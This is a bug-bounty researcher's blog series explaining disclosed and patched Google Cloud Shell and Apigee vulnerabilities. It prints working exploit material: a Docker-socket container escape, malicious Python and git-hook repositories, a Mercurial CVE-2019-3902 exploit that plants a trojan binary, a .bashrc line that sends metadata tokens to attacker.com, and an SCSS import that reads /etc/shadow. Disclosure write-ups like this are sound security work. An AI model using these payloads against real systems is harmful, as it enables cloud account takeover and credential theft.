4 Google Cloud Shell bugs explained – bug #1

Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow's video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #1 – The Python Language Server

Introduction

Google Cloud Shell provides users with a feature called "Open In Cloud Shell". Using this feature, users can create a link that automatically opens Cloud Shell and clones a Git repository hosted on either GitHub or Bitbucket. This is done by passing the 'cloudshell_git_repo' parameter to the Cloud Shell URL, as can be seen in the code below:

<a href="https://ssh.cloud.google.com/cloudshell/editor?cloudshell_git_repo=http://path-to-repo/sample.git"><img alt="Open in Cloud Shell" src="https://gstatic.com/cloudssh/images/open-btn.svg"></a>

Upon opening the link, Cloud Shell is launched and the 'http://path-to-repo/sample.git' repo is cloned inside the user's home directory.

Other parameters can be passed besides the 'cloudshell_git_repo' GET-parameter. When combining 'cloudshell_git_repo' with the 'open_in_editor' parameter, we can clone a repository and launch the Theia IDE on a specified file all at once. A full overview of all supported GET-parameters can be found in the Cloud Shell documentation.

PYLS

When a user clones a Git repository containing 'some_python_file.py' and passes this file to the open_in_editor GET-parameter ('open_in_editor=some_python_file.py'), the Theia editor opens the specified file. In the editor we can see that, all of a sudden, the IDE has syntax highlighting and autocompletion capabilities.

When inspecting the running processes with 'ps', we notice a new process: the editor_exec.sh script fired up the pyls Python language server.

wtm          736  0.0  0.1  11212  2920 ?        S<s  13:54   0:00 /bin/bash /google/devshell/editor/editor_exec.sh python -m pyls

The parent process appears to be sshd. If we attach strace to the sshd process and watch the Python language server being fired up, we can inspect all the system calls being executed. We save the output to ‘/tmp/out’ for later inspection.
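
A minimal sketch of how such a trace can be captured, assuming the sshd process is found via pgrep (the exact PID selection may differ on your instance):

# attach to the oldest sshd process, follow forked children, log all syscalls
sudo strace -f -p "$(pgrep -o sshd)" -o /tmp/out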

While going through all the syscalls in '/tmp/out', I noticed that the Python language server was querying non-existent packages in my home directory with the stat() syscall.

538   stat("/home/wtm/supervisor", 0x7ffdf08e11e0) = -1 ENOENT (No such file or directory)
542   stat("/home/wtm/pyls", 0x7ffcbbf61a10) = -1 ENOENT (No such file or directory)
542   stat("/home/wtm/google", 0x7ffcbbf5fe00) = -1 ENOENT (No such file or directory)

When Python imports a package, it executes the package's '__init__.py' file; before Python 3.3, every package was required to have one (PEP 420 later introduced namespace packages that may omit it). We now have our attack vector!
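
To illustrate the mechanism, here is a minimal sketch: any package directory on the import path is enough to get code executed at import time.

# a regular package executes its __init__.py on import
mkdir supervisor
echo 'print("code executed at import time")' > supervisor/__init__.py
python -c 'import supervisor'    # prints: code executed at import time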

Constructing the exploit

If we create an evil Python git repository named 'supervisor', 'pyls' or 'google' containing a malicious '__init__.py', we can trick the Python language server into executing arbitrary code. All we have to do is store the evil repository on GitHub and point our victim to https://ssh.cloud.google.com/console/editor?cloudshell_git_repo=https://github.com/offensi/supervisor&open_in_editor=__init__.py. By passing '__init__.py' to the 'open_in_editor' GET-parameter, we force the IDE into automatically launching the Python language server.

That same language server now starts looking for a package named 'supervisor', which of course can now be found, since we have just cloned a repository with that exact name. The malicious code hidden inside '__init__.py' is then executed, meaning our victim's GCP resources are compromised.
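
A rough sketch of how such a repository could be put together; the payload and the remote URL are purely illustrative:

# build the malicious 'supervisor' package as a git repository
git init supervisor && cd supervisor
echo 'import os; os.system("id > /tmp/pwned")' > __init__.py    # placeholder payload
git add __init__.py && git commit -m 'add payload'
# publish it and embed its clone URL in the cloudshell_git_repo parameter
git remote add origin https://github.com/attacker/supervisor.git    # hypothetical remote
git push -u origin master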

Continue reading: Bug #2 – A custom Cloud Shell image

4 Google Cloud Shell bugs explained – bug #2

Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow's video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #2 – A custom Cloud Shell image

Introduction

The Cloud Shell presented to you by default is based on a Debian 9 Stretch Docker image. This image contains the most popular tools and is stored in Google's Container Registry at gcr.io/cloudshell-images/cloudshell:latest.

If users have special needs, they can replace the default Debian Cloud Shell image and launch a custom image. For example, if you wish to use a Terraform image for infrastructure provisioning, you can replace the Debian image with the Terraform image under the Cloud Shell Environment settings.

Another way to automatically boot a custom Docker image is by providing the ‘cloudshell_image’ GET-parameter, as such: https://ssh.cloud.google.com/cloudshell/editor?cloudshell_image=gcr.io/google/ruby

The trusted environment

Google makes a distinction between the default image and custom images. A container running the default image comes with your home folder mounted at /home/username. Furthermore, upon boot it provisions your gcloud client with credentials.

Launching a custom image from an untrusted third party might introduce a security risk: what if a custom image contains malicious code and tries to access your GCP resources?

Google therefore introduced a 'trusted' and an 'untrusted' mode. The only image that automatically runs in trusted mode is 'gcr.io/cloudshell-images/cloudshell:latest'. When booting a custom image in untrusted mode, the container is provisioned with an empty scratch home directory mounted at /home/user, which is deleted when the session ends. Furthermore, no credentials are attached to the gcloud client, and you cannot query the metadata server at metadata.google.internal to obtain a bearer token.
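
A quick way to verify which mode you are running in, sketched under the assumption that the untrusted container simply cannot reach the metadata server:

# trusted mode returns a token here; untrusted mode fails
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
gcloud auth list    # untrusted mode: no credentialed accounts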

Escaping the untrusted environment

We have already learned how to escape to the host from the default Cloud Shell in the general introduction of this series of posts. We again paste the following lines of code:

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name LiveOverflow-container -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start LiveOverflow-container
sudo docker -H unix:///google/host/var/run/docker.sock exec -it LiveOverflow-container /bin/sh

At this point we have a shell on the host. We change the root by chrooting into /rootfs with 'chroot /rootfs'. After searching the filesystem, it became apparent that the host instance was in a different state than expected: while the container hosting the custom Docker image had an empty /home/user folder attached to it, the 'dmesg' and 'mount' commands clearly show that the persistent disk containing the user's home folder is still attached to the underlying instance!
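
The relevant inspection steps look roughly like this (device and mount names will vary):

# inside the privileged LiveOverflow-container, pivot into the host filesystem
chroot /rootfs /bin/bash
# look for the user's persistent home disk that is still attached
mount | grep -i home
dmesg | tail -n 50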

Exploiting it

With the above knowledge, any attacker can now build a malicious Docker image. This image can use the same technique as displayed above to escape to the host instance when booted. After escaping to the host, it can steal contents from the user's home folder.

Furthermore, an attacker can write arbitrary contents to the user's home folder in an attempt to steal credentials, for example by adding the following code to '/var/google/devshell-home/.bashrc':

curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token > /tmp/token.json
curl -X POST -d @/tmp/token.json https://attacker.com/api/tokenupload
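
From the escaped container, this write could look roughly as follows, assuming the host root filesystem is still mounted at /rootfs as in the escape script shown earlier:

# append the token-stealing snippet to the victim's .bashrc via the host mount
cat >> /rootfs/var/google/devshell-home/.bashrc << 'EOF'
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token > /tmp/token.json
curl -X POST -d @/tmp/token.json https://attacker.com/api/tokenupload
EOF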

Continue reading: Bug #3 – Git clone

4 Google Cloud Shell bugs explained – bug #3

Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow's video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #3 – Git clone

Introduction

In bug #1 of this series of articles, we discussed appending the 'cloudshell_git_repo' GET-parameter to the Cloud Shell URL in order to clone a GitHub or Bitbucket repository. Aside from this parameter, we can also specify the 'cloudshell_git_branch' and 'cloudshell_working_dir' parameters to aid in the cloning process.

How does this work? When we pass these 3 parameters to the Cloud Shell URL, the cloudshell_open bash function is called inside your terminal window. This function is defined in '/google/devshell/bashrc.google.d/cloudshell_open.sh'. The most important lines of code are listed below.

function cloudshell_open {
... 
git clone -- "$cloudshell_git_repo" "$target_directory"
cd "$cloudshell_working_dir"
git checkout "$cloudshell_git_branch"
...
}

We see that 'git clone' is executed against the URL specified in the cloudshell_git_repo GET-parameter. The script then changes the working directory by cd-ing into whatever directory is specified in cloudshell_working_dir, and finally calls 'git checkout' on the specified git branch. Considering that all input parameters are properly filtered, this might seem harmless at first.

Git-hooks

Git-hooks are custom scripts that are fired when an important action is executed. The git-hooks created by default when you run 'git init' are stored in .git/hooks and look similar to this:
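
For reference, a freshly initialized repository ships with a set of inert sample hooks:

git init demo && ls demo/.git/hooks
# applypatch-msg.sample  pre-commit.sample  pre-push.sample
# commit-msg.sample      pre-rebase.sample  update.sample  ...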

Wouldn't it be cool if we could store these custom scripts inside an evil repository and have them executed when a victim's Cloud Shell executes 'git checkout'? According to the Git manual, that's not possible: these are client-side hooks, and anything hidden inside .git/ is ignored and thus not copied to the remote repo.

Bare repositories

The standard way of creating a repository is with 'git init'. This creates a working repository with the well-known layout: it contains a .git/ directory, where all revision history and metadata are stored, alongside the checked-out versions of the files you are working on.

There is, however, another format in which a repository can be stored: a bare repository. This type of repository is normally used for sharing and has a sort of flat layout. It can be created by running 'git init --bare'.
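
A quick comparison makes the difference visible:

# bare layout: the repository internals sit at the top level,
# including a hooks/ directory made of ordinary files
git init --bare bare-demo && ls bare-demo
# HEAD  branches  config  description  hooks  info  objects  refs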

The exploit

As the listing above shows, a bare repository has no '.git' directory but DOES have a 'hooks' directory! This means we can push the hooks stored in a bare repository to a remote repo, if we hide the bare repository in a subdirectory of a 'normal' repository. Remember the 'cd' command in the cloudshell_open function? We can jump into any subdirectory we want and execute 'git checkout', after which any hooks present get fired.
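
A rough sketch of how such a repository could be assembled; the published PoC linked below handles the remaining details (such as the nested repository's config) needed for git to accept the directory during checkout:

# outer 'normal' repository that the victim will clone
git init git-poc && cd git-poc
# nest a bare-layout repository in a subdirectory; unlike .git/,
# its hooks/ consists of ordinary files and survives the push
git init --bare evilgitdirectory
cat > evilgitdirectory/hooks/post-checkout << 'EOF'
#!/bin/sh
echo "post-checkout hook fired"    # harmless placeholder payload
EOF
chmod +x evilgitdirectory/hooks/post-checkout
git add . && git commit -m 'hide hooked bare repo in a subdirectory'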

I published a proof of concept for this bug at https://github.com/offensi/git-poc. Running a git clone and a checkout on this repository, as specified in the README, will execute a harmless post-checkout hook.

An evil URL to target a Cloud Shell victim would look like this: https://ssh.cloud.google.com/console/editor?cloudshell_git_repo=https://github.com/offensi/git-poc&cloudshell_git_branch=master&cloudshell_working_dir=evilgitdirectory. Upon opening it, the victim's Cloud Shell clones the repository, cd's into 'evilgitdirectory' and runs 'git checkout', firing the post-checkout hook.

Continue reading: Bug #4 – Go and get pwned

4 Google Cloud Shell bugs explained – bug #4

Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow's video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #4 – Go and get pwned

Introduction

While auditing the JavaScript code that is responsible for all the client-side work in your browser when working with Cloud Shell, I noticed something out of the ordinary.

The code that handles all GET-parameters listed a parameter that is not present in the official documentation.

   var B3b = {
        CREATE_CUSTOM_IMAGE: "cloudshell_create_custom_image",
        DIR: "cloudshell_working_dir",
        GIT_BRANCH: "cloudshell_git_branch",
        GIT_REPO: "cloudshell_git_repo",
        GO_GET_REPO: "cloudshell_go_get_repo",
        IMAGE: "cloudshell_image",
        OPEN_IN_EDITOR: "cloudshell_open_in_editor",
        PRINT: "cloudshell_print",
        TUTORIAL: "cloudshell_tutorial"
    };

All parameters listed above are explained in the documentation, except for the 'cloudshell_go_get_repo' GET-parameter. When constructing a Cloud Shell URL with this parameter (https://ssh.cloud.google.com/cloudshell/editor?cloudshell_go_get_repo=https://github.com/some/package), the cloudshell_open function is, again, invoked.

The code responsible for handling the ‘go get’ command can be seen below.

function cloudshell_open {
...
valid_url_chars="[a-zA-Z0-9/\._:\-]*"
...
 if [[ -n "$cloudshell_go_get_repo" ]]; then
    valid_go_get=$(echo $cloudshell_go_get_repo | grep -e "^$valid_url_chars$")
    if [[ -z "$valid_go_get" ]]; then
      echo "Invalid go_get"
      return
    fi
...
go get -- "$cloudshell_go_get_repo"
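# note: the 'cut' in the pipeline below is resolved via $PATH;
# this is the invocation the exploit later hijacks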
go_src="$(go env GOPATH | cut -d ':' -f 1)/src/$go_get"

All input seemed to be filtered properly. Nevertheless, I kept some notes about this finding.

Container Vulnerability Scanning

A few months later, I was hunting for bugs in Google's Container Registry (gcr.io). One of the features it provides is called Vulnerability Scanning: when enabled, every Docker image you push to the registry is scanned for known vulnerabilities and exposures. As new vulnerabilities are discovered, the Container Registry checks whether they affect images in your registry.

One of the Docker images I had been working on before was, of course, the Cloud Shell image that's available at https://gcr.io/cloudshell-images/cloudshell:latest. I had this image readily available on my local Docker engine, so I pushed it to the registry in order to inspect the workings of the Vulnerability Scanning feature.

Upon opening the results of the scan against the Cloud Shell image, I was a bit surprised: the image seemed to be packed with over 500 vulnerabilities.

After checking almost every vulnerability that was listed, I finally found one that looked interesting and useful: CVE-2019-3902.

Exploiting CVE-2019-3902

CVE-2019-3902 describes a vulnerability in Mercurial: due to a flaw in the path-checking logic of the Mercurial (hg) client, a malicious repository can write files outside of the repository boundaries on the client's filesystem. I knew that the 'go get' command is capable of handling several types of repositories: svn, bzr, git and hg!

Since there was no public exploit for CVE-2019-3902 available, I had to try to reconstruct it. I downloaded two versions of the Mercurial source code, the patched version and the unpatched one, hoping that comparing the two would provide me with clues on how to exploit it.
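
Sketched roughly, with the version pair as an assumption (CVE-2019-3902 was fixed in Mercurial 4.9, so 4.8 serves as the unpatched reference):

# fetch and unpack the last unpatched and the first patched release
curl -O https://www.mercurial-scm.org/release/mercurial-4.8.tar.gz
curl -O https://www.mercurial-scm.org/release/mercurial-4.9.tar.gz
tar xzf mercurial-4.8.tar.gz && tar xzf mercurial-4.9.tar.gz
# compare the two trees for changes to the path-checking logic
diff -ru mercurial-4.8 mercurial-4.9 | less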

While examining the patched Mercurial source code, I stumbled across automated test cases stored in the /tests/ directory. Based on these tests, I was able to reconstruct the exploit.

#!/bin/sh
# PoC for Google VRP by wtm@offensi.com
mkdir hgrepo
hg init hgrepo/root
cd hgrepo/root
# create a symlink named "bin" that points outside the repository
ln -s ../../../bin
hg ci -qAm 'add symlink "bin"'
# register a subrepository under the same name; a vulnerable client
# will traverse the symlink when checking out the subrepo
hg init ../../../bin
echo 'bin = bin' >> .hgsub
hg ci -qAm 'add subrepo "bin"'

# populate the subrepo with a malicious 'cut' replacement
cd ../../../bin
echo '#!/bin/sh' >> cut
echo 'wall You have been pwned!' >> cut
chmod +x cut
hg add cut
hg commit -m "evil cut bin"

cd /var/www/html/hgrepo/root
hg commit -m "final"

The code above constructs a malicious repository. When this repository is cloned by a vulnerable hg client, a malicious file named 'cut' is written to ../../../bin, relative to the clone destination. As we saw in the cloudshell_open function earlier, the 'cut' command is called right after 'go get' clones our malicious repository, and thus our arbitrary code is executed.

The malicious repo was stored on a personal webserver under go.offensi.com/hgrepo. A malicious go.html file was placed in the root of the webserver to instruct the 'go get' command to clone a Mercurial repository:

<meta name="go-import" content="go.offensi.com/go.html hg https://go.offensi.com/hgrepo/root">

Now any Cloud Shell user can be tricked into arbitrary code execution by opening this link: https://ssh.cloud.google.com/cloudshell/editor?cloudshell_go_get_repo=https://go.offensi.com/go.html

4 Google Cloud Shell bugs explained

Quick navigation

  • Introduction (this page)
  • Bug #1 – The Python language server
  • Bug #2 – A custom Cloud Shell image
  • Bug #3 – Git clone
  • Bug #4 – Go and get pwned



Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow's video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Introduction

In 2019 I spent a significant amount of my time hunting for bugs in the Google Cloud Platform. While the Google Cloud Platform is known to be a tough target among bughunters, I was lucky enough to have some modest success in finding bugs in one of its services, the Google Cloud Shell.

In July I was therefore approached by Eduardo of the Google VRP. He asked me if I was willing to demonstrate a Cloud Shell bug to LiveOverflow as part of an interview for a video, on one precondition though: the bug had to be unfixed by Google! LiveOverflow did a great job of polishing up my bug; the result can be seen here.

Later on, Google invited me to attend the BugSWAT event in October at Google's HQ in London. At this event I was able to share some of my findings with my fellow bughunters and Googlers by giving a talk titled "4 Cloudshell bugs in 25 minutes".

In total I discovered 9 vulnerabilities in the Google Cloud Shell. In this series of posts I will uncover and explain 4 of them, ending with my favorite one.

About Google Cloud Shell

Google Cloud Shell provides administrators and developers with a quick way to access cloud resources. It provides users with a Linux shell that is accessible via the browser. This shell comes with the pre-installed tools needed to start working on your Google Cloud Platform project, such as gcloud, Docker, Python, vim, Emacs and Theia, a powerful open-source IDE.

Users of the Google Cloud Platform can launch a Cloud Shell instance via the Cloud Console, or simply by visiting this URL: https://console.cloud.google.com/home/dashboard?cloudshell=true&project=your_project_id

When the Cloud Shell instance is done starting, a terminal window is presented to the user. Noteworthy is the fact that the gcloud client is already authenticated. If an attacker is able to compromise your Cloud Shell, they can access all of your GCP resources.

Escaping the Cloud Shell container

When inspecting the running processes with 'ps' inside the Cloud Shell, it looks like we might be trapped inside a Docker container: only a small number of processes is running.

To confirm our suspicion, we can inspect the /proc filesystem. Docker Engine for Linux makes use of so-called control groups (cgroups). A cgroup limits an application to a specific set of resources; for example, by using cgroups Docker can limit the amount of memory that is allocated to a container. In the case of Cloud Shell, I identified the use of Kubernetes and Docker by inspecting the contents of /proc/1/environ.
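
The kind of evidence to look for, roughly (exact variable names may differ):

# the environment of PID 1 leaks Kubernetes service variables
cat /proc/1/environ | tr '\0' '\n' | grep -i kube
# cgroup membership also betrays the container runtime
cat /proc/self/cgroup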

At this point I knew for sure I was trapped inside a container. If I wanted to learn more about the inner workings of Cloud Shell, I needed to find a way to escape to the host. Luckily, after exploring the filesystem, I noticed that there were 2 Docker unix sockets available: one at '/run/docker.sock', which is the default path for the Docker client running inside the Cloud Shell (Docker inside Docker), and a second one at '/google/host/var/run/docker.sock'.

The pathname of the second unix socket reveals that this is the host-based Docker socket. Anyone who can communicate with a host-based Docker socket can easily escape the container and gain root access on the host at the same time.
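
Pointing the Docker client at each socket in turn makes the difference obvious; a quick sketch:

# the in-container daemon versus the host daemon
sudo docker -H unix:///run/docker.sock info | grep -i 'name:'
sudo docker -H unix:///google/host/var/run/docker.sock info | grep -i 'name:'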

Using the script below, I escaped to the host.

# create a privileged container with host root filesystem mounted - wtm@offensi.com
sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name LiveOverflow-container -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start LiveOverflow-container
sudo docker -H unix:///google/host/var/run/docker.sock exec -it LiveOverflow-container /bin/sh

The bigger picture

Now that I had root access on the host, I started exploring the configuration of Kubernetes, which is stored in YAML files under '/etc/kubernetes/manifests/'. Based on the Kubernetes configuration and several hours of inspecting traffic with tcpdump, I gained a better overview of how Cloud Shell works, and I created a quick and dirty high-level diagram to keep track of it.

Reconfigure Kubernetes

Most of the containers inside the Kubernetes pods run unprivileged by default. Because of this, we are unable to use debugging tools like gdb and strace inside these containers: both rely on the ptrace() syscall, which requires at minimum the SYS_PTRACE capability. Rather than granting just the SYS_PTRACE capability, it is easier to run all containers in privileged mode. I therefore wrote a script to reconfigure the 'cs-6000' pod.

The script below writes a new cs-6000 manifest and symlinks the old config to /dev/null. After running it, you will find that all containers inside the pod automatically restart. Now all containers run in privileged mode, and we can start debugging.

#!/bin/sh
# wtm@offensi.com

# write new manifest
cat /etc/kubernetes/manifests/cs-6000.yaml | sed s/"    'securityContext': \!\!null 'null'"/\
"    'securityContext':\n"\
"      'privileged': \!\!bool 'true'\n"\
"      'procMount': \!\!null 'null'\n"\
"      'runAsGroup': \!\!null 'null'\n"\
"      'runAsUser': \!\!null 'null'\n"\
"      'seLinuxOptions': \!\!null 'null'\n"/g > /tmp/cs-6000.yaml

# replace old manifest with symlink
mv /tmp/cs-6000.yaml /etc/kubernetes/manifests/cs-6000.modified
ln -fs /dev/null /etc/kubernetes/manifests/cs-6000.yaml

Continue reading: Bug #1 – The Python language server

LFI in Apigee portals

Introduction

Apigee provides clients with an API management platform that enables them to design, secure, deploy, monitor, and scale APIs. Furthermore, Apigee provides clients with a customizable developer portal that enables developers to consume APIs easily and securely, and to measure API performance and usage. Apigee was acquired by Google in 2016 and is therefore considered in scope for the Google VRP, meaning that any valid vulnerability found in the Apigee platform will be rewarded.

Creating a custom portal

In order to interact with the development community, API providers can expose their API to the public by building a custom portal. Apigee portals are based on Drupal 7 and come with a preloaded set of options for users to customize: from the Portal management interface, users can modify the default theme, add pages and users, manage assets and publish APIs.

When done editing, the portal manager publishes the portal on a subdomain of apigee.io; healthapix.apigee.io shows a clear example of what the end result of a portal looks like.

Customizing the stylesheet

According to the documentation on https://docs-new.apigee.com, users can edit the style of the theme by using SCSS instead of CSS:

The style rules are defined using Sassy Cascading Style Sheet (SCSS). SCSS is a superset of Cascading Style Sheets (CSS), offering the following advantages:

  • Global variables that can be re-used throughout the style sheet.
  • Nested rules to save style sheet development time.
  • Ability to create mixins and functions

This implies that compilation and conversion take place on the server side; after compilation completes, regular CSS files are published to the portal. This process looks like something that might be worth taking a closer look at.

The import directive

When going through the language-specific documentation on sass-lang.com, there is one directive that stands out from the rest:

CSS has an import option that lets you split your CSS into smaller, more maintainable portions. The only drawback is that each time you use @import in CSS it creates another HTTP request. Sass builds on top of the current CSS @import but instead of requiring an HTTP request, Sass will take the file that you want to import and combine it with the file you’re importing into so you can serve a single CSS file to the web browser.

In short, the import directive allows us to reference other SCSS files using this syntax: @import 'somefile'. When it sees this directive, the Sass compiler will automatically try to locate 'somefile.scss', 'somefile.sass' or 'somefile'. Depending on the version of the compiler you are using, you might see some small differences in behavior.

Exploitation

What happens if we reference an arbitrary file with @import ‘/etc/shadow’? This file does not contain valid SCSS code, so compilation will most likely fail.

Compilation indeed fails, throwing an error that exposes the contents of /etc/shadow, a file that is only readable by the root user.
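
The behavior can be sketched locally with a standalone Sass compiler (assuming sassc is installed; exact error output differs per compiler version):

# reproduce the idea outside Apigee
echo "@import '/etc/shadow';" > evil.scss
sassc evil.scss out.css
# compilation aborts with an error that quotes the offending input,
# echoing back the referenced file's contents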

This particular bug was fixed within a matter of hours after submitting the details to Google. Thanks to Google for running the VRP the way they do!

Copyright © 2020 Offensi
